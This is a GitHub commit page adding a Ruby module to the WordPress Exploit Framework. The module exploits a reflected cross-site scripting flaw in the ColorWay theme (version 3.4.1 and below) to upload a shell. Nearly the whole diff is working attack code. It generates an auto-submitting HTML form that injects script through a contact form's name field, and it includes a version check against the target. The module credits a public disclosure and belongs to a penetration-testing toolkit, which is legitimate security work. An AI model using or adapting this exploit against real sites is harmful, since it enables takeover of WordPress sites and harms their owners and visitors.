This repository was archived by the owner on Oct 22, 2020. It is now read-only.
File tree Expand file tree Collapse file tree 1 file changed +45
-0
lines changed
Expand file tree Collapse file tree 1 file changed +45
-0
lines changed Original file line number Diff line number Diff line change 1+ class Wpxf ::Exploit ::ColorwayReflectedXssShellUpload < Wpxf ::Module
2+ include Wpxf ::WordPress ::StagedReflectedXss
3+
4+ def initialize
5+ super
6+
7+ update_info (
8+ name : 'ColorWay <= 3.4.1 Reflected XSS Shell Upload' ,
9+ author : [
10+ 'Yorick Koster' , # Discovery and disclosure
11+ 'Rob Carr <rob[at]rastating.com>' # WPXF module
12+ ] ,
13+ references : [
14+ [ 'WPVDB' , '8568' ] ,
15+ [ 'URL' , 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html' ]
16+ ] ,
17+ date : 'Jul 26 2016'
18+ )
19+
20+ register_option (
21+ StringOption . new (
22+ name : 'contact_url' ,
23+ desc : 'The URL of a contact form' ,
24+ required : true
25+ )
26+ )
27+ end
28+
29+ def check
30+ check_theme_version_from_style ( 'colorway' , '3.4.2' )
31+ end
32+
33+ def initial_script
34+ %|<html><head></head><body><script>
35+ #{ js_post }
36+ post('#{ datastore [ 'contact_url' ] } ', {
37+ contactName: "\\ "><script>#{ xss_include_script } <\\ /script>",
38+ email: '#{ Utility ::Text . rand_alpha ( 5 ) } ',
39+ comments: '',
40+ submitted: 'true'
41+ });
42+ </script></body></html>
43+ |
44+ end
45+ end
You can’t perform that action at this time.
0 commit comments